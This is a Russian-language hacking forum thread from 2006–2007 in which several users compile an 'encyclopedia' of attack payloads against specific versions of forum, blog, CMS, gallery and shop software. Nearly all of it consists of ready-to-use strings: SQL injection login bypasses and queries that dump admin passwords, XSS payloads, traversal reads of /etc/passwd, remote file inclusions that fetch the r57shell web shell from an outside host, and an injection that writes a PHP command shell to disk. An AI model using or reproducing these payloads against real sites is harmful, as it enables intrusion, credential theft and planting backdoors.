Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Энциклопедия уязвимых скриптов (https://forum.antichat.xyz/showthread.php?t=19997)

DIAgen 01.06.2006 15:51

Энциклопедия уязвимых скриптов
 
Энциклопедия уязвимых скриптов

----------------------------------------------------------------

Так же обратите внимание на темы:
Обзор уязвимостей [WordPress]
[Обзор уязвимостей в форумных движках]
Уязвимости чатов и Движков
Уязвимости в cms WCPS
----------------------------------------------------------------

Эта коллекция уязвимостей собиралась для личного использования. Если кому-нибудь пригодится, значит все сделано не зря!

Форумы

phpBB v.2.0.15 Выполнение php кода в viewtopic.php
viewtopic.php?t=1&highlight='.printf(md5(test)).'
PBLang 4.65 Локальный include файлов
setcookie.php?u=../../../../../../../../../../etc/passwd%00
setcookie.php??u=../../../../../../../../../../boot.ini%00

PHPTB v.2.0 Include файлов
/classes/admin_o.php?absolutepath= http://rst.void.ru/download/
r57shell.txt

MailGust v.1.9 SQL Injection
post запрос index.php
method=remind_password&list=maillistuser&fromlist= maillist&frommethod=showhtmllist&email=1%27%
20union%20select%20%2A%20from%20force_sql_error%2F %2A%40hotmail%2Ecom&submit=Ok&showAvatar

Chipmunk Forum XSS
newtopic.php?forumID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527 )
%3E%3C/IFRAME%3E

oaboard v.1.0 SQL Injection
forum.php?channel=0%20union%20select%20*%20from%20 force_mysql_table_error
Phorum 5.0.20 SQL Injection
search.php?1,search=%20,page=1,match_type=ALL,matc h_dates=30,match_forum=ALL,body=
1,author=1,subject=1,&forum_ids[]=-99)/**/generate_sql_error

Cyphor 0.19 XSS
/include/footer.php?t_login=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
W-Agora 4.2.0 XSS
/templates/admin/login_form.php?msg_login=%3Cscript%3Ealert(%22XSS% 22)%3C/script%3E
WizForum 1.20 SQL Injection
ForumTopicDetails.php?TopicID=11111111%20union%20S elect%20*%20from%20EronatedInex
istentTable

EkinBoard 1.0.3 SQL Injection
admin/index.php ?page=general&step=2
Cookie: username=%27or+isnull%281%2F0%29+AND+level%3D3%2F% 2A; password=
Snitz Forums 2000 v.3.4.05 XSS
post.asp ?method=Topic&FORUM_ID=1&CAT_ID=1&type=xss-${random}
PHP-Post 1.0 XSS
profile.php ?user='%3CIFRAME%20SRC=javascript:alert(%2527xss-${random}%2527)%3E%3
C/IFRAME%3E

WSN Forum 1.21 SQL Injection
memberlist.php ?action=profile&id=1'%20select%20*%20from%20force_ mysql_warning
sCssBoard 1.12 XSS
index.php ?act=search-results
post search_term=%3Cscript%3Ealert%28%27wvs-${random}%27%29%3C%2Fscript%3E+&sortby=relevancy

freeForum 1.1 SQL Injection
forum.php?mode=thread&thread=force_mysql_fetch_obj ect_warning
Orca Forum 4.3.b SQL Injection
forum.php ?msg=2'force_mysql_num_rows_warning
Pearl Forums 2.4 SQL Injection
index.php ?mode=forums&forumId=1%20union%20select%20*%20from %20force_error
SimpleBBS v.1.1 Выполнение php кода
index.php ?v=newtopic&c=1
POST name=<?php echo md5("test");?>&subject=mysubject&message=mymessage &sendTopic=Send

ADP Forum v.2.0.2 Информация о пользователя
/users/
ADN Forum v.1.0b SQL Injection
verpag.php?pagid=999'%20and_force_mysql_error/*
MyBuletinBoard v.1.0.2 Раскрытие префикса таблицы
search.php?s=de1aaf9b&action=do_search&keywords=a& srchtype=3
MyTopix v.1.2.3 SQL Injection и раскрытие пути срипта
/modules/logon.mod.php
Pentacle In-Out Board v.6.03.0.0080 SQL Injection
login.asp POST username=anypassword&userpassword=%27+or+%271%27%3 D%271&Submit=Log+in
Battleaxe Software Forums v.2.0 XSS
failure.asp ?err_txt=text%3C/b%3E%3Cscript%3Ealert(%22xss-${random}%22);%3C/script%3E%3Cb%3Etext

PHP Библиотеки

PEAR XML_RPC 1.3.0 Выполнение команд (подвержены Affected PEAR XML_RPC versions (up to 1.3.0). Affected web applications:TikiWiki. PostNuke
Drupal. b2evolution. b2. phpGroupWare. eGroupware. Serendipity Weblog. phpAdsNew. Max Media Manager. phpWiki. Blog:CMS. CivicSpace )
xmlrpc.php xmlrpc/server.php serendipity_xmlrpc.php adxmlrpc.php nucleus/xmlrpc/server.php

POST <?xmlversion="1.0"?><methodCall><methodName>test.m ethod</methodName><params><param><value><name>','')); printf(md5(acunetix_wvs_security_test)); exit;//</name></value></param></params></methodCall>
ADOdb
1) SQL Injection
/server.php?sql=SELECT '[content]' INTO OUTFILE '[file]'
2) Выполнение функции php
/tests/tmssql.php?do=phpinfo

Network tools

phpLDAPadmin 0.9.6 Выполнение php кода
welcome.php ?custom_welcome_page= http://rst.void.ru/download/r57shell.txt
Netquery [host] Произвольное выполнение команд
nquser.php POST
1) querytype=dig&host=a%27%7Ccat%20%27%2Fetc%2Fpasswd &digparam=ANY&x=11&y=17
2) querytype=dig&host=%7Ccat%20%2Fetc%2Fpasswd&digpar am=ANY&x=11&y=17


Календари и Планировщики

phpCommunityCalendar v.4.0.3 Обход Логина
webadmin/login.php POST Username=%27+or+isnull%281%2F0%29+%2F*&Password=&R eturned=1
Calendarix v.1.6 SQL Injection
cal_login.php POST login=%27+or+isnull%281%2F0%29%2F*&password=any
Teca Diary Personal Edition v.1.0 SQL Injection
index.php?mm='%20force_sql_error&yy=2006
CALimba v.0.99.2 Sql Injection
index.php POST ute_login=%27%29+or+isnull%281%2F0%29%2F*&ute_pass word=anypassword&cmdOK=Login%21
Maian Events v.1.00 SQL Injection
menu.php?month='forceerror'

Блоки новостей

myBloggie 2.1.3 SQL Injection
login.php POST username=%27+or+isnull%281%2F0%29+%2F*&passwd=&sub mit=Log+In
Simplog 0.9.1 SQL Injection
archive.php?blogid=force_error_for_test_reason
Zomplog 3.4 XSS
get.php?username=%3Cbr%3E%3Cb%3Exss%3C/b%3E%3Cbr%3E
CuteNews 1.4.1 Shell Injection
show_archives.php ?template=../inc/ipban.mdu%00&member_db[1]=1&action=add&add_ip=%22%3C?php%20echo%20md5(%22te st%22)
;%20die;?%3E.%22%20HTTP/1.0\r\n
Cute News 1.4.1 Local File Inclusion
show_archives.php?template=../../../../../../../../../../etc/passwd%00
show_archives.php?template=../../../../../../../../../../boot.ini%00

SimpleBlog v.2.1 SQL Injection
default.asp ?view=archives&month=%22generate_error&year=2004
Bit5blog v.8.1 SQL Injection
admin/processlogin.php POST username=%27+or+isnull%281%2F0%29%2F*&password=%27 +or+isnull%281%2F0%29%2F*
WebspotBlogging v.3.0 SQL Injection
login.php POST username=%27+or+isnull%281%2F0%29%2F*&password=any password
e-moBLOG v.1.3 SQL Injection
/admin/index.php POST login=aaa%27+union+select+%27bbb%27%2C+%27161da2fa 81d32d4071ee16f7f77cb463%27%2F*&password=
any_password

miniBloggie v.1.0 SQL Injection
login.php POST user=%27+or+isnull%281%2F0%29%2F*&pwd=%27+or+isnul l%281%2F0%29%2F*&submit=Log+In
Text Rider v.2.4 Список пользователей
/data/userlist.txt
AndoNET Blog SQL Injection
index.php?ando=comentarios&entrada=1'generate%20er ror
Loudblog v.0.4 PHP Code Injection
/loudblog/inc/backend_settings.php?GLOBALS[path]= http://rst.void.ru/download/r57shell.txt
PluggedOut Blog v.1.9.9c SQL Injection
exec.php?action=comment_add&entryid=force_error
Clever Copy v.3.0 SQL Injection
mailarticle.php?ID='UNION%20SELECT%200,0,0,0,0,0,u sername,password,0,0,0,0,0,0,0,0,0
%20FROM%20CC_admin/*

Magic News Lite v.1.2.3 Code Injection
preview.php?php_script_path=http://rst.void.ru/download/r57shell.txt
WordPress v.2.0.1 Раскрытие пути
/wp-includes/default-filters.php
sBlog v.0.7.2 XSS
search.php POST keyword=%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3B%3C%2Fscript%3E
Maian Weblog v.2.0 SQL Injection
print.php?cmd=log&entry=1'%20or%20generate_error=2

DIAgen 01.06.2006 22:31

Faq Systems

phpMyFAQ 1.5.1 SQL Injection
admin/password.php POST username=%27+or+isnull%281%2F0%29+%2F*&email=1@2.c om
A-FAQ 1.0 SQL Injection
faqDsp.asp?catcode=12%20union%20select%20name%20fr om%20msysobjects%20in%20'\nopath\
sqlerr

Atlantis Knowledge Base Software v.3.0 SQL Injection
search.php POST searchStr=%25%27+union+select+*+from+force_mysql_w arning%2F*
ASP Survey v1.10 SQL Injection
/Admin/Login_Validate.asp POST Username=admin&Password=%27or%27&Dest=http%3A%2F%2 Fasp.loftin-nc.com%2FASPSurvey%2FDemo%2FAdmin%2
FDefault.asp

Owl v.0.82 File Inclusion
/lib/OWL_API.php?xrms_file_root=nonexistent_test_includ efile%00

Web Portals

PHPNuke 7.8 Remote Directory Traversal
modules.php?name=Search&file=../../../../../../../../../../etc/passwd%00
modules.php?name=Search&file=../../../../../../../../../../../boot.ini%00


Партнерские системы

TWiki rev Parameter Remote Command Execution Vulnerability
view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd
view/Main/TWikiUsers?rev%3D2%20%7Ctype%20%5Cboot%2Eini

PmWiki 2.0.12 q-Parameter XSS
pmwiki.php ?n=Site.Search?action=search&q=test_search_item%27 %20onMouseOver%3D%27alert%28%22wvs-xss-magic
-string-${random}%22%29%3B%27%20

ProjectApp v.3.3 XSS
default.asp ?skin_number=XSS.css%22%3E%3Cscript%3Ealert('wvs-xss-magic-string-${random}')%3C/script%3E%3C
IntranetApp v.3.3 XSS
login.asp ?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
dotproject v.2.0.1 File Inclusion
includes/db_adodb.php?baseDir=http://rst.void.ru/download/r57shell.txt
Qwiki v.1.5.1 XSS
index.php?page=Home&from='%3Cscript%3Ealert(%22xss-${random}%22)%3C/script%3E

Administration Tools

phpMyAdmin grab_globals.lib.php
libraries/grab_globals.lib.php POST usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/../../../../../../../
../../../etc/passwd&subform[1]
libraries/grab_globals.lib.php POST
usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/../../../../../../../
../../../boot.ini&subform[1]

phpMyAdmin XSS
queryframe.php?lang=en-iso-8859-1&server=1&hash=">='%3C/a%3E%3CIFRAME%
20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E

phpMyAdmin Раскрытие пути
libraries/charset_conversion.lib.php ?cfg[AllowAnywhereRecoding]=true&
allow_recoding=true)


CMS Systems

PHP-Fusion 6.00.109 SQL Injection
faq.php?cat_id=1%27%20or%20force_mysql_error%3D%27 2
MySource 2.14.0 File Inclusion
init_mysource.php ?INCLUDE_PATH=http://rst.void.ru/download/r57shell.txt
e107 v0617 SQL Injection
e107_files/resetcore.php POST a_name=%27+or+isnull%281%2F0%29%2F*&a_password=&us ubmit=Continue
lucidCMS 1.0.11 SQL Injection
index.php?command=panel
PhpWebThings 1.4.4 SQL Injection
forum.php?forum=-1%20union%20select%20password,password,null,null%2 0from%
20test_mysql_injection%20where%20uid=1/*

Envolution v.1.1.0 SQL Injection
modules.php?op=modload&name=News&file=index&catid= %221%22%20AND%20force_error=error
Acidcat v.2.1.13 SQL Injection
default.asp?ID=26%20union%20select%201,2,2,3,passw ord,5,6%20from%20Configuration
DEV v1.5 SQL Injection
index.php?session=0&action=openforum&cat=force_err or
SiteEnable v.3.3 XSS
login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
PortalApp v.3.3 XSS
login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
Typo3 v.3.8.1 Раскрытие пути
/tslib/showpic.php
RunCMS v.1.3a5 XSS
/modules/mydownloads/ratefile.php?lid=1%22%3E%3Cscript%3Ealert('xss-${random}');
%3C/script%3E%3Cbr%20name=%22nothing

Mambo v.4.5.3h SQL Injection
/index.php POST username=%27or+isnull%281%2F0%29%2F*&passwd=anypas sword&option=login&Submit=Login&op2=login&lang
=english&return=${file}&message=0

Dragonfly CMS v.9.0.6.1 XSS
/index.php POST search=%22%3E%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3C%2Fscript%3E&topic=0&cat
=0&news_search_comments=0&coppermine=

Nodez v.4.6.1.1 XSS
/index.php?node=system&op=block%3Cscript%3Ealert(%2 2wvs-xss-magic-string-${random}%22)
%3C/script%3E&block=3&bop=more

XOOPS v.2.0.11 SQL Injection
/xmlrpc.php POST <?xml version="1.0"?><methodCall><methodName>blogger.get UsersBlogs</methodName><params><param><value>
<string></string></value></param><param><value><string>any') or isnull(1/0)/*</string></value></param></params></methodCall>


Gallery Applications

Gallery "g2_itemId" локальный иклуид
main.php?g2_itemId=/../../../../../../../../../../../boot.ini%00
main.php?g2_itemId=/../../../../../../../../../../../etc/passwd%00
/upgrade/index.php ?stepOrder[]=../../../../../../../../include_inexistent_file.txt%00

Coppermine Photo Gallery v.1.4.2 игнорировать конфигурацию
relocate_server.php POST continue=1
Instant Photo Gallery v.1.0 SQL Injection
portfolio.php?cat_id="force_sql_error
Enhanced Simple PHP Gallery v.1.7 Раскрытие пути
index.php?dir=inexistent_directory
WhiteAlbum v.2.5 SQL Injection
pictures.php?dir=force_mysql_warning
LinPHA v.1.0 Local File Inclusion
/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00
/docs/index.php?lang=/../../../../../../../../../../boot.ini%00


Script Collections

Codegrrl Arbitrary Local File Inclusion
protection.php?action=logout&siteurl=../../../../../../../../../../etc/passwd%00
protection.php?action=logout&siteurl=../../../../../../../../../../boot.ini%00

Techno Dreams Products SQL Injection
admin/login.asp POST userid=%27union+all+select+%271%27%2C%271%27+from+ admin+where+%27%27%3D%27&passwd=1&submit=Login
AlstraSoft Template Seller Pro 3.25 File Inclusion
include/paymentplugins/payment_paypal.php?config[basepath]=inexistent_hacker_box
AlstraSoft Affiliate Network Pro v.7.2 SQL Injection
admin/admin_login_validate.php POST login=%27+or+isnull%281%2F0%29+%2F*&passwd=&B1=Log in
OpenEdit v.4.0 XSS
/store/search/results.html ?page=%3Ciframe%3Exss-${random}%3C/iframe%3E

Электронная коммерция

Zend Cart 1.2.6 SQL Injection
admin/password_forgotten.php POST admin_email=%27UNION+SELECT+0%2C0%2C%27%3C%3Fphp+s ystem%28%24_GET%5Bcmd%5D%29%3B+%3F%3E%27%2C0
+INTO+OUTFILE+%27shell.php%27+FROM+force_table_err or%2F*&submit=resend

Lizard Cart CMS v.1.0.4 SQL Injection
detail.php?id=-1'
My Amazon Store Manager v1.0 XSS
/search.php ?q=%3Cscript%3Ealert('xss-${random}')%3C/script%3E&Mode=apparel
CRE Loaded v.6.15 XSS
/admin/htmlarea/popups/file/files.php?q=%3Cscript%3Ealert('xss-${random}')%3C/
script%3E&Mode=apparel

NZ Ecommerce SQL Injection
/index.php?action=Information&informationID=1%20and %20generate_error=error

Guest Book Applications

Ades Guestbook v.2.0 XSS
read.php ?pageNum_rsRead=1&totalRows_rsRead=%3Cscript%3Eale rt%28%27wvs-xss-magic-string-${random}%27%29%3
C%2Fscript%3E


Development Tools

Mantis 1.00 File Inclusion
bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../../etc/passwd%00
bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../../../boot.ini%00

Flyspray 0.9.8 XSS
index.php ?tasks=all%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3 C%2Fscript%3E%26project%3D0
Gemini v.2.0 XSS
/issue/createissue.aspx?rtcDescription$RadEditor1=1><scri pt>alert(${random});</script>

Другие инструменты

Digital Scribe 1.4 SQL Injection
login.php POST username=%22+or+isnull%281%2F0%29+%2F*&pass1=&subm it=Login
ATUTOR 1.5.1 SQL Injection
password_reminder.php POST form_password_reminder=true&form_email=%27
PHP Advanced Transfer Manager System локальный include
viewers/txt.php?filename=../../../../../../../../../../boot.ini%00
viewers/txt.php?filename=../../../../../../../../../../etc/passwd%00

Chipmunk Topsites XSS
recommend.php ?ID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527 )%3E%3C/IFRAME%3E
Chipmunk Directory XSS
recommend.php ?entryID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527 )%3E%3C/IFRAME%3E
Gcards 1.44 limit parameter SQL Injection
news.php ?limit=force_sql_error
phpSysInfo 2.3 XSS
index.php ?VERSION=%22%3E%3Cscript%3Ealert('FORCE_XSS')%3C/script%3E
Advanced Poll 2.03 XSS
popup.php ?poll_ident=%3Cscript%3Ealert(%22wvs-xss-magic-string-${random}%22)%3C/script%3E
PHPGreetz 0.99 Remote File Include
content.php?content=http://rst.void.ru/download/r57shell.txt
eFiction 1.1 XSS и SQL Injection
titles.php?action=viewlist&let='%20UNION%20SELECT% 200,0,'%3Cscript%3Ealert(%22wvs-xss-magic-string-${random}%22)%3C/script%3E',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pen name,0%20FROM%20fanfiction_authors%20/*
Google API Search Engine v.1.3.1 XSS
index.php?REQ=%3Cscript%3Ealert%28%27wvs-xss-magic-string-${random}%27%29%3C%2Fscript%3ESubmit=Submit
phpArcadeScript v.2.0 XSS
/includes/tellafriend.php?about=game&gamename=%3Cscript%3Eal ert(${random});%3C/script%3E

DIAgen 05.11.2006 13:51

Update
 
Код:

Форумы
phpBB v.1.20 локальный инклуид
/admin/admin_hacks_list.php?setmodules=3D1&board_conf=ig[default_lang]=3Denglish&phpEx=3D${random}
MyBulletinBoard v.1.1.5 SQL инъекция
http://www.milw0rm.com/exploits/2012
dotNetBB v2.42EC.SP3 XSS
/iforget.aspx POST em=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E
Toast Forums v.1.6 XSS
?action=posts&sub=search&fid-1&author=r0t&subject=%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E%3C
SKForum v.1.5 XSS
?areaID=%3Cscript%3Ealert('XSS')%3B%3C/script%3E&time=%3Cscript%3Ealert('XSS')%3B%3C/script%3E
Invision Power Board v.2.0.3 XSS
Шаг 1
?act=Search&CODE=01
POST
keywords=test&namesearch=&forums%5B%5D=all&searchsubs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc&search_in=posts&result_type=topics
Шаг 2
GET
%2F%24%7B%69%6E%63%6C%75%73%69%6F%6E%5F%70%61%72%61%6D%65%74%65%72%73%7D%3D%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%78%73%73%74%65%73%74%22%29%3B%3C%2F%73%63%72%69%70%74%3E
Invision Power Board v2.1.6 SQL инъекция
CLIENT-IP: ' UNION SELECT 'test',1,1,1/*
WWWThreads Forum XSS
calendar.php?week=%22%3E%3Cscript%3Ealert(${random})%3C/script%3E
MercuryBoard v.1.1.4 SQL инъекция
?a=active - User-Agent: 123456'
Integramod Portal  v.2.0 локальный инклуид
?phpbb_root_path=http://evalphp

Календари и Планировщики
WebCalendar v.4.0 SQL инъекция
?EventID=arbitrary_id%20or%20sql_injection_tet=test
Connect Daily v.3.2.9  XSS
?start=<script>alert("XSS");</script>
Thyme v.1.3 XSS
POST searchfor=%3Cscript%3Ealert%28%22${random}%22%29%3B%3C%2Fscript%3E
MaxxSchedule v.1.0 XSS
?Error=<script>alert("XSS");</script>
MultiCalendars v.3.0  SQL инъекция
?calsids=sql_error
myEvent v.1.4 php инклуид
?myevent_path=http://evalphp?
TeamCal Pro v.2.8.001 локальный инклуид
?tc_config[app_root]=http://evalphp?

Блоки новостей
myBloggie v.2.1.4 SQL инъекция
POST title='generate_error)/*&url=http://
Simplog v.0.9.1 Локальный инклуид
?cmd=ls%20-la&s=http://evalphp%00
Cute News v.1.4.5 XSS
?dosearch=yes&title="><script>alert("XSS");</script>&user=&from_date_day=&from_date_month=&from_date_year=&to_date_day =&to_date_month=&to_date_year=
WordPress v.2.0.3 SQL инъекци
?paged=-1
Simple PHP Blog v.0.4.7.1 Локальный инклуид
?blog_language=../../../../../../../../../../../inexistent_directory/inexistent_file.php%00
EasyMoblog v.0.5.1 XSS
?i=nothing.txt%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E%3Cimg%20src=%22img/posts/nothing.txt%22
bMachine v.2.9b XSS
POST key=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3C
Artmedic Newsletter v.4.1.2 Выполнение php
?logfile=info.php&logtime=000060&email=%3C?php%20echo%20md5(%22test%22);%20?%3E
Eggblog v.3.6 SQL инъекция
?id='1234567
pppBlog v.0.3.8 Локальный инклуид
?files[0]=../config/admin.php
BLOG:CMS v4.0.0 SQL инъекция
?id=9999999'/**/UNION/**/SELECT/**/mpassword/**/FROM/**/nucleus_member/**/WHERE/**/mnumber=1/*
DeluxeBB v1.08 SQL инъекция
Cookie: membercookie=test;memberid=1;memberpw=')or isnull(1/0) or(1='

Различные скрипты (редкие)
Digital Scribe 1.4 SQL
POST username=%22+or+isnull%281%2F0%29+%2F*&pass1=&submit=Login
ATUTOR 1.5.1 SQL
POST form_password_reminder=true&form_email=%27
PHP Advanced Transfer Manager System Disclosure
?filename=../../../../../../../../../../etc/passwd%00
Gcards v.1.45 SQL
username=%27+or+isnull%281%2F0%29%2F*&userpass=%27+or+isnull%281%2F0%29%2F*
PHPGreetz 0.99 Инклуид
?content=http://evalphp/
eFiction 1.1 SQL-XSS
?action=viewlist&let='%20UNION%20SELECT%200,0,'%3Cscript%3Ealert(%22XSS%22)%3C/script%3E',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,penname,0%20FROM%20fanfiction_authors%20/*
DoceboLMS 2.04 Инклуид
?Command=GetFoldersAndFiles&Type=../../../../../../../../&CurrentFolder=
Enterprise Connector v.1.02  SQL
POST loginid='or isnull(1/0) /*
PhpGedView v.3.3.7 Инклуид
?PGV_BASE_DIRECTORY=../../../../../../../../../etc/passwd
PHPjournaler v.1.0 SQL
?readold=999%20union%20select%201,password,3,4,name,6%20from%20eronated_table_name/*
PHPStatus v.1.0 SQL
POST username=%27or+isnull%281%2F0%29+%2F*&password=anypassword&submit=Login
NetOffice v.2.5.3-pl1 SQL
POST loginForm=%27+or+acuerro%3D1%2F*&send=Send
phpListPro v.2.0.0  Инклуид
?returnpath=http:/evalphp%00
phpWebFTP v.3.2 Локальный инклуид
POST server=&port=21&user=qqq&password=qqq&language=../../../../../../../../../../etc/passwd%00
EDirectoryPro 2006-05-09 SQL
?Category=all&keyword=sql_error%27&mode=date
Timesheet PHP 1.2.1 SQL
POST redirect=%2Ftest%2Ftimesheet_1_2_1%2Fcalendar.php&username=testuser%27&password=testpassword%27&Login=submit
Web-News v.1.6.3 Инклуид
?content_page=http://evalphp?

Faq Systems
Absolute FAQ Manager v.4.0  XSS
POST topicid=1&question=%3Cscript%3Ealert%28%22$XSS%22%29%3B%3C%2Fscript%3E&imageField.x=14&imageField.y=6
PHPKB v.1.5 XSS
POST searchkeyword=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&category=0&Submit=Search+Knowledge+Base

Web Portals
SQuery v.4.5 (phpNuke module) Инклуид
?libpath=http://evalphp?

Партнерские системы
PHPCollab v.2.4 SQL
POST loginForm=%27error%27+or+error
Tiki Wiki v.1.9.3.1 XSS
?days=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert(%22XSS%22);%3C/scr%3C/script%3Eipt%3E%3E
DokuWiki v.2006-03-09b dwpage.php php-eval
X-FORWARDED-FOR: <?php echo md5("acunetix_test_text");?>

Administration Tools
Confixx 3 Professional v.3.1.2 SQL
?SID='%22
Pivot v1.30 RC2
edit_new.php?Paths[extensions_path]=ftp://username:password@somehost.com/
edit_new.php?Paths[extensions_path]=/etc/passwd%00
blogroll.php?fg=[XSS]
blogroll.php?line1=[XSS]
blogroll.php?line2=[XSS]
blogroll.php?bg=[XSS]
blogroll.php?c1=[XSS]
blogroll.php?c2=[XSS]
blogroll.php?c3=[XSS]
blogroll.php?c4=[XSS]
editor/edit_menu.php?name=[XSS]
editor/edit_menu.php?js_name=[XSS]
photo.php?h=><script>alert(document.cookie)</script>
photo.php?w=><script>alert(document.cookie)</script>
cPanel v.10.8.2.118 XSS
?dir=%3E%3Cscript%3Ealert(XSS)%3C/script%3E

CMS Systems
Simpleboard v1.1.0 (Mambo component) Инклуид
?sbp=http://evalphp?
Tim-online PHPBB v1.2.4RC3 (Mambo component) Инклуид
?phpbb_root_path=http://evalphp?
Galleria v1.0 (Mambo component) Инклуид
?mosConfig_absolute_path=http://evalphp?
Pearl For Mambo v.1.6  Инклуид
?GlobalSettings[templatesDirectory]=http://evalphp?
Videodb (Mambo component) v.0.3 Инклуид
?mosConfig_absolute_path=http://evalphp?
Loudmouth (Mambo component)  v.4.0 Инклуид
?mosConfig_absolute_path=http://evalphp?
Mambo up to v.4.6.1 SQL
Cookie: usercookie[password]=%27 or 1=1/*; usercookie[username]=admin
99articles Инклуид
?page=http://evalphp?
OpenPHPNuke v.2.3.3 Инклуид
?root_path=http://evalphp?
Ottoman  v.1.1.2 Локальный инклуид
?default_path=path%00
Ajax Portal v.3.0 SQL
POST rs=searchBoxes&rst=&rsrnd=1152608713921&rsargs[]=search%20%25%27%29%20LIMIT%200%20UNION%20SELECT%201337%2Cusername%2Cpassword%2Cgenerate_error%20FROM%20p${random}/*&rsargs[]=all&rsargs[]=0
MyPHP CMS v.0.3 Инклуид
?installed=23&domain=http://evalphp?
Plume CMS v1.3 Инклуид
?_PX_config[manager_path]=http://evalphp?
SmartSiteCMS v1.0  Инклуид
?root=http://evalphp?
GeekLog v1.4.0 Инклуид
?_CONF[path]=http://evalphp?
Etomite CMS v.0.6.1 SQL
POST rememberme=1&location&username=99999999$'/**/UNION/**/SELECT/**/0,'acunetixtest',MD5('acunetixtest'),0,0,0,0,0,0,0,0,0,0,0,0,0,0/*&password=acunetixtest&thing&submit=Login&licenseOK=1
SaveWebPortal v.3.4 Инклуид
?SITE_Path=http://evalphp?
phpFullAnnu v.5.1 Инклуид
?repmod=http://evalphp?

Gallery Applications
JetPhoto Server v.1.x XSS
?name=%22%3E%3Cscript%3Ealert(XSS);%3C/script%3E
photokorn v.1.542 SQL
?action=showgal&cat=[sql]
PhotoPost v.4.6 Инклуид
?PP_PATH=http://evalphp?

Development Tools
Mantis 1.00 Локальный инклуид
?t_core_path=../../../../../../../../etc/passwd%00
Flyspray 0.9.8 XSS
?tasks=all"><script>alert("XSS")</script>&project=0
Gemini v.2.0 XSS
?rtcDescription$RadEditor1=1><script>alert(XSS);</script>
paBugs v.2.0b3 Инклуид
?path_to_bt_dir=http://evalphp?

Электронная коммерция
QuickEStore v.7.9 SQL
?CFID=&CFTOKEN=&CategoryID=[sql]
Leadhound 2006-04-28  XSS
?login=<script>alert("XSS");</script>
SunShop Shopping Cart v.3.5 XSS
?action=item&id=%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
OrbitHYIP v.2.0 XSS
?referral=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22XSS%22%29%3B%3C%2F%73%63%72%69%70%74%3E
CyberBuild 06.05.03 XSS
?SessionID=[%22%3E%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
PhpHostBot v.1.0 Инклуид
?page=http://evalphp?
PHP Simple Shop v.2.0 Инклуид
?abs_path=http://evalphp?
CubeCart v.2.0.7 XSS
?la_pow_by=%3Cscript%3Ealert(XSS)%3C/script%3E
osCommerce v.2.2 XSS
?zone=%3Cscript%3Ealert(XSS)%3C/script%3E

Ну тут уже так себе, не чего особеного нет!!!
Creative Community Portal v.1.1 SQL
?article_id='
WoWRoster v.1.5.0 Инклуид
?subdir=http://evalphp?
Popper v.1.41.r2 Инклуид
?form=http://evalphp?


+StArT+ 12.02.2007 15:33

+ без комментариев!

И от меня парочку. ;)

Ananda Real Estate 3.4 SQL Injection

list.asp?agent=-1%20union%20select%20username,0,0,0,0,0,password,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20user %20where%20id%20like%201

Enthrallweb ePhotos 1.0 SQL Injection

subLevel2.asp?Cat_ID=33&SUB_ID=-1%20union%20select%20U_ID,U_PASSWORD,0,0,0,U_email ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0,0%20from%20users

Unidomedia Chameleon 1.203 LE и PRO Include файлов

index.php?rmid=../../../../../etc/passwd%00

PhpbbXtra 2.0 File Inclusion

includes/archive/archive_topic.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt

Dragon Business Directory Pro 3.01.12 SQL Injection

bus_details.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0%20from%20admin

Lesnoy_chelovek 21.02.2007 03:15

Ещё пара штук:

Галлереи
4images 1.7.1
http://[target]/[path]/index.php?template=../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/index.php?cmd=ls%0-la&template=../../data/tmp_media/suntzu1293.jpg%00

35mmslidegallery 6
http://example.com/lumet/album/index.php?imgdir='><script>alert(10)</script>
http://example.comr/lumet/album/popup.php?w='><script>alert(10)</script>
http://example.com/lumet/album/popup.php?h='><script>alert(10)</script>
http://example.com/lumet/album/popup.php?t='><script>alert(10)</script>


Гостевые:
@lex Guestbook 4.0.1
http://[victim]/[guestbook_path]/index.php?skin=[XSS]


Форумы:
ADNForum 1.0b
http://host/adnforum/index.php?fid=3333'%20union%20select%201111/*

ADP Forum 2.0.3
http://target.com/pacth/users/username.txt

CAForum 1.0
admin/default.asp?password=1'%20OR%20'1'%20=%20'1

CoolForum 0.8.3
